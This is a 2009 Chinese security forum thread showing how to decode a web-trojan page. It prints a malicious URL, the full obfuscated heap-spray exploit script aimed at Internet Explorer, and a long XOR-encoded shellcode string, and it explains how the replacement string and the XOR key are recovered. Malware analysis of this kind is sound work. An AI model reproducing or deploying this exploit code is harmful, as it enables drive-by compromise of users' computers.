瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 关于解密中容易忽略网马类型(补充)
networkedition - 2009-6-8 11:14:00
在这里首先感谢一下艾玛和轩辕小聪两位版主的指导。在这篇网马解密教程中,大家对于shellcode这部分可能还会有些疑问,即为什么要将b78替换为%u,实际在恶意网址源代码中,已经给出了解密方法(函数),这部分替换和利用自身解密函数进行解密教程一文中类似。下面就针对这点再来补充说明一下:



用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2009-6-8 11:24:00
上图为bf.htm源代码处理好截图,红色框内容即为一个替换函数,在实际网马解密中类似的shellcode变换,在网站源代码中都会有类似varXXX=unescape(sfcode.replace(/b78/g,"\x25\x75"))替换函数,所以在网马解密中,还需要多详细查看一下源代码内容,在那里会找到一些解密的蛛丝马迹。在这里\x25\x75实际上就是%u,replace是替换字符串,即将b78替换为%u。在利用自身的解密函数来进行解密教程一文中有提到,具体可参看利用自身的解密函数来进行解密教程。
networkedition - 2009-6-8 13:54:00
再补充一个例子,以这个恶意网址为例:http://jjjt3t4.8866.org/a/02.htm,以下为源代码内容:

<script src="set.js"></script>
<script language="JavaScript">
eval(unescape("%76%61%72%20%74%65%73%74%39%39%3d%79%75%6d%65%6e%3b%76%61%72%20%79%75%6d%65%6e%3d%6e%65%77%20%41%72%72%61%79%28%29%3b%54%61%6d%65%65%65%65%65%65%3d%75%6e%65%73%63%61%70%65%28%74%74%74%2e%72%65%70%6c%61%63%65%28%2f%67%66%64%73%2f%67%2c%22%5c%78%32%35%5c%78%37%35%22%29%29%3b%77%68%69%6c%65%28%62%2e%6c%65%6e%67%74%68%3c%30%78%31%30%30%30%30%30%2d%28%74%74%74%2e%6c%65%6e%67%74%68%2a%32%2b%30%78%30%31%30%32%30%29%2f%32%29%7b%62%2b%3d%62%7d%76%61%72%20%6c%68%3d%62%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%30%78%31%30%30%30%30%30%2d%28%74%74%74%2e%6c%65%6e%67%74%68%2a%32%2b%30%78%30%31%30%32%30%29%2f%32%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%30%78%43%30%3b%69%2b%2b%29%7b%79%75%6d%65%6e%5b%69%5d%3d%6c%68%2b%54%61%6d%65%65%65%65%65%65%7d%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%76%61%72%20%73%31%3d%75%6e%65%73%63%61%70%65%28%22%25%22%2b%22%75%22%2b%22%30%22%2b%22%62%22%2b%22%30%22%2b%22%62%22%2b%22%25%22%2b%22%75%22%2b%22%30%22%2b%22%62%22%2b%22%30%22%2b%22%62%22%2b%22%61%67%7a%61%67%7a%61%67%7a%61%67%7a%61%67%7a%61%67%7a%61%67%7a%61%67%7a%61%22%29%3b%76%61%72%20%61%31%3d%6e%65%77%20%41%72%72%61%79%28%29%3b%66%6f%72%28%76%61%72%20%78%3d%30%3b%78%3c%31%30%30%30%3b%78%2b%2b%29%61%31%2e%70%75%73%68%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%69%6d%67%22%29%29%3b%66%75%6e%63%74%69%6f%6e%20%6f%6b%28%29%7b%6f%31%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%74%62%6f%64%79%22%29%3b%6f%31%2e%63%6c%69%63%6b%3b%76%61%72%20%6f%32%3d%6f%31%2e%63%6c%6f%6e%65%4e%6f%64%65%28%29%3b%6f%31%2e%63%6c"+"%65%61%72%41%74%74%72%69%62%75%74%65%73%28%29%3b%6f%31%3d%6e%75%6c%6c"+"%3b%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%66%6f%72%28%76"+"%61%72%20%78%3d%30%3b%78%3c%61%31%2e%6c%65%6e%67%74%68%3b%78%2b%2b%29%61%31%5b%78%5d%2e%73%72%63%3d%73%31%3b%6f%32%2e%63%6c%69%63%6b%7d"));
</script><script>window.setTimeout("ok();",330);</script>


networkedition - 2009-6-8 13:55:00
02.htm里有个set.js使用freshow的filter功能过滤出,check源代码为:


var ttt = unescape("gfds11ebgfds4b5bgfdsc933gfds96b9gfds0005gfds8000gfds0b34gfdse2bcgfdsebfagfdse805gfdsffeagfdsffffgfds8454gfdsbcbfgfdsd4bcgfds9cbcgfdsbcbcgfdsbcd6gfds6c43gfds3a05gfdsbcb9gfds37bcgfds5744gfdse2b9gfds184fgfds6c43gfds4a54gfds4343gfds5443gfdsbf83gfdsbcbcgfds4437gfds8454gfdsbcbcgfds54bcgfdsbdf3gfdsbcbcgfdsfa54gfdsbcbcgfds54bcgfdsbf61gfdsbcbcgfds4437gfds9e54gfdsbcbcgfds54bcgfdsbdfagfdsbcbcgfds8c54gfdsbcbcgfds54bcgfdsbf37gfdsbcbcgfds4437gfdsb054gfdsbcbcgfds54bcgfdsbddfgfdsbcbcgfdsa654gfdsbcbcgfds57bcgfdsefe4gfds6037gfdsd6efgfdsd4fcgfdsacbcgfdsbcbcgfds54ebgfdsbe0fgfdsbcbcgfds5954gfdsbcbcgfdse4bcgfdsef7fgfds6037gfdsd6efgfdsd49cgfdsacbcgfdsbcbcgfds54ebgfdsbe27gfdsbcbcgfds7154gfdsbcbcgfdse4bcgfdseb7fgfds8254gfdsbcb8gfds37bcgfds8f44gfdsf575gfds7c8fgfds7f0cgfds4e40gfds3112gfds43fbgfds7fe3gfds82e7gfdsbb7agfds8204gfdse335gfds82bdgfds7bdagfdsb9fbgfds5c43gfds557fgfdsb82bgfdsbcbcgfds3de7gfdsa850gfdsbcbdgfds37bcgfds8268gfdsbe7bgfdsd1dfgfds9cd8gfds7b82gfdsb8fegfdsdf93gfds9e9cgfds7e3fgfds8fb4gfdsec7cgfdsd4ecgfdsbdb8gfdsbcbcgfdsefeegfds54ecgfdsbf7fgfdsbcbcgfds6c43gfds4037gfds7b37gfds7c3fgfds82b4gfdsa436gfds6738gfdsbfc8gfds57fcgfds824agfdsbc7agfds8f9egfds826egfdsec34gfds3fbdgfdse850gfds7c8fgfds678fgfds7037gfds443fgfdsc1e8gfds82b5gfdsa035gfds3fb4gfdsb87cgfds4e57gfds7037gfds6537gfds7f3fgfds8facgfds827cgfdsff7bgfdsbd90gfdsbcbcgfdsedbcgfdsecefgfdsececgfdsececgfdsebecgfds54ecgfdsbf87gfdsbcbcgfdsa554gfdsbcbcgfdsd8bcgfdsb81dgfdsbcbcgfds31bcgfdsdc1cgfds4343gfds5443gfdsbf85gfdsbcbcgfds678fgfdsefefgfdsefefgfds6c43gfds843cgfdsc855gfds3cb9gfds5484gfdsb3c9gfdsc43dgfds2cb9gfds2c2cgfdsc82cgfdse9bagfds5037gfdsfc31gfds43b9gfds545cgfds4390gfds4343gfds547fgfds439agfds4343gfdsad04gfdsb8bdgfds7e3cgfdsbcb0gfdsa554gfds4343gfds8f43gfdsec7cgfds54e8gfdsbce8gfdsbcbcgfds54ecgfdsbe37gfdsbcbcgfds6c43gfds3c8agfds9880gfdscbbcgfds54b6gfdsbefdgfdsbcbcgfds438fgfds43ebgfds546cgfdsbd47gfdsbcbcgfds43d4gfdsbcbcgfds43bcgfds546cgfds425agfds4343gfdsebefgfds8feagfdsec7cgfds54e8gfdsbca2gfdsbcbcgfds54ecgfdsbee9gfdsbcbcgfds6c43gfds3c8agfds9880gfdscbbcgfds54b6gfdsbeb7gfdsbcbcgfds438fgfds43ebgfdse46cgfdse3e2gfds7fe7gfdsbe57gfds7fe4gfds4554gfds4343gfdsea43gfds3febgfdsb450gfds4037gfdsb4d6gfds82ebgfdscb43gfds54a8gfdsbee1gfdsbcbcgfds6c43gfds4037gfdsddd4gfdsd9d1gfdsd4bcgfdsf9f5gfdscefagfds4837gfdsb405gfdsbcbcgfds4fbcgfdsc91agfdsd693gfds82bcgfdsc843gfds9c98gfds9854gfdsbcbegfds43bcgfds376cgfds5444gfdsbd77gfdsbcbcgfds6c43gfds4487gfdsb4c8gfds378agfds98f8gfds829cgfdsbc43gfds4382gfds98c8gfds54a0gfdsbd53gfdsbcbcgfds6c43gfds783fgfdse3acgfds04e2gfdsbcbdgfdsbcbcgfdsd47fgfdsd2d3gfdsbcbcgfdsc9d4gfdsd0cegfds57d1gfds31a9gfds98f8gfdsecb8gfds9c54gfds4342gfdsec43gfdsf654gfdsbcbegfds55bcgfds425cgfds4343gfds5a54gfds4343gfds3f43gfdsb478gfdsd67fgfdsd4d0gfdsc8d2gfdsd0d8gfdsa957gfdsf831gfdsb898gfds54ecgfds4145gfds4343gfds54ecgfdsbe9fgfdsbcbcgfds0555gfds4342gfds5443gfds435agfds4343gfds783fgfds7fb4gfds8fd4gfdsbc8egfdsd4bcgfdscfc9gfdsced9gfdsa957gfdsf831gfdsb898gfds54ecgfds4173gfds4343gfds54ecgfdsbd45gfdsbcbcgfds3355gfds4342gfds5443gfds435agfds4343gfds783fgfds7fb4gfdsdfd4gfdscbcagfdsd4bcgfdsd4cfgfdsd3d8gfdsa957gfdsf831gfdsb898gfds54ecgfds4119gfds4343gfds54ecgfdsbd73gfdsbcbcgfdsd955gfds4342gfds5443gfds435agfds4343gfds783fgfds7fb4gfdscad4gfdsc4dbgfds57bcgfds31a9gfds98f8gfdsecb8gfds3c54gfds4341gfdsec43gfds1654gfdsbcbdgfds55bcgfds42fcgfds4343gfds5a54gfds4343gfds3f43gfdsb878gfds547fgfdsbd17gfdsbcbcgfdsa7d4gfdsfa7agfdsecc5gfds7a54gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbd2bgfdsbcbcgfds50d4gfdsbf2bgfdsecb0gfds0e54gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbd3fgfdsbcbcgfds16d4gfdsb140gfdsecc0gfds2254gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbdd3gfdsbcbcgfds51d4gfds53eagfdsec8agfds3654gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbde7gfdsbcbcgfds4cd4gfdsb836gfdsece3gfdsca54gfdsbcbdgfds3fbcgfdsb478gfds547fgfds424bgfds4343gfdsc4d4gfds67d4gfdseca0gfdsde54gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbd8fgfdsbcbcgfdsc2d4gfds5e64gfdseccfgfdsf254gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbda3gfdsbcbcgfds0cd4gfds91f5gfdsec67gfds8654gfdsbcbdgfds3fbcgfdsb478gfds547fgfds438agfds4343gfds17d4gfds27e2gfdseca2gfds9a54gfdsbcbdgfds3fbcgfdsb478gfds547fgfds421bgfds4343gfdse5d4gfds3d2bgfdsecbegfdsae54gfdsbcbdgfds3fbcgfdsb478gfds547fgfdsbc5fgfdsbcbcgfdsc2d4gfds5e64gfdseccfgfds4254gfdsbcbcgfds3fbcgfdsb478gfds547fgfdsbc73gfdsbcbcgfds22d4gfds0745gfdsec89gfds5654gfdsbcbcgfds3fbcgfdsb478gfds547fgfds422egfds4343gfdsebd4gfds091cgfdsec07gfds6a54gfdsbcbcgfds3fbcgfdsb478gfds547fgfds42c2gfds4343gfdsa6d4gfdsa2c6gfdsecbegfds7e54gfdsbcbcgfds3fbcgfdsb478gfds547fgfds42d6gfds4343gfds5cd4gfds8ce7gfdsec28gfds1254gfdsbcbcgfds3fbcgfdsb478gfds547fgfds42eagfds4343gfds2bd4gfds5e75gfdsec1fgfds2654gfdsbcbcgfds3fbcgfdsb478gfds547fgfds42fegfds4343gfdsd4d4gfds7998gfdsec0fgfds3a54gfdsbcbcgfds3fbcgfdsb478gfds547fgfdsbcebgfdsbcbcgfdsced4gfds0f42gfdsecaagfdsce54gfdsbcbcgfds3fbcgfdsb478gfds547fgfds42f8gfds4343gfdsaf57gfdsd9d6gfds54ecgfds4749gfds4343gfds54ecgfds4217gfds4343gfds0955gfds4340gfds5443gfds4354gfds4343gfds547fgfds4115gfds4343gfdsf3d4gfdsf353gfdsecb9gfds8254gfdsbcbcgfds3fbcgfdsb478gfds547fgfdsbcb3gfdsbcbcgfds32d4gfdsb2f2gfdsec50gfds9654gfdsbcbcgfds3fbcgfdsb478gfds8f7fgfdsd87cgfdsfc37gfds398cgfdsc47cgfds82acgfdsfc37gfds82b0gfdscc37gfds11a0gfds3782gfdsb4fcgfds577fgfds82b7gfdsfc37gfds3f88gfdsc07cgfds3782gfds80fcgfdsdc7fgfds378agfds98d0gfds8a98gfdsf937gfds8a80gfdse837gfdsc494gfds69bfgfds3782gfdsa4f6gfds3782gfds9ce6gfds61bfgfds875fgfds82f5gfds8837gfdsbf37gfds8f49gfds8f43gfds407cgfds3810gfdsc87cgfds7dbbgfdsb173gfds44bfgfds4857gfds878agfds98c0gfdsc994gfds8263gfdse637gfdsbf98gfds8261gfds37dagfdsf7b0gfds3782gfdsa0e6gfds61bfgfds3782gfds37b8gfds79bfgfds358agfds98f8gfdsdda0gfds547fgfds47d8gfds4343gfdsc8d4gfdsccc8gfds9386gfdsd393gfds8ed3gfds8c8egfds928cgfdsd3dfgfds93d1gfdsd1cbgfds8c93gfds928egfdsc4d9gfdsBCd9gfdsBC");
var b=unescape("\x25\x75\x30\x43\x30\x43\x25\x75\x30\x43\x30\x43");


networkedition - 2009-6-8 14:03:00
简单分析一下set.js源代码内容类似shellcode,该如何替换呢,我们也尝试来找一下看是否有类似的解密函数(方法),来看一下父级链接地址02.htm源代码内容:除了一个set.js外就一个eval加密了。使用在线解密工具,对eval进行解密。




实际上被加密了,通过在线解密工具解密后,可以看到解密函数。在这里是将gfds替换为%u。
networkedition - 2009-6-8 14:09:00
接下来就容易了,使用freshow的replace功能替换gfds为%u,两次esc(这个shellcode带密钥,XORbc,密钥为bc),解密后网马地址见下图:

艾玛 - 2009-6-8 15:21:00
:kaka12: 有理!
redbsd - 2009-8-20 21:25:00
怎么判断shellcode 密钥????
esc(这个shellcode带密钥,XORbc,密钥为bc),怎么知道是bc.
谢谢???
S′Man - 2009-8-20 22:16:00


引用:
原帖由 redbsd 于 2009-8-20 21:25:00 发表
怎么判断shellcode 密钥????
esc(这个shellcode带密钥,XORbc,密钥为bc),怎么知道是bc.
谢谢???


怎么判断shellcode 密钥????
当你用异域值0解不开的时候 那说明是有密钥的
怎么知道是bc???
有个土方法:当你把gfds替换成%u的时候看后面的东西 你会发现BC是最多的
正规的方法就是把SHELLCODE 弄成EXE的 OD载入 等等 BAIDU下!

菜鸟幼稚的回复 大牛请不要见笑
springyun - 2010-5-29 22:19:00
小菜鸟来学习了:kaka1:
1
查看完整版本: 关于解密中容易忽略网马类型(补充)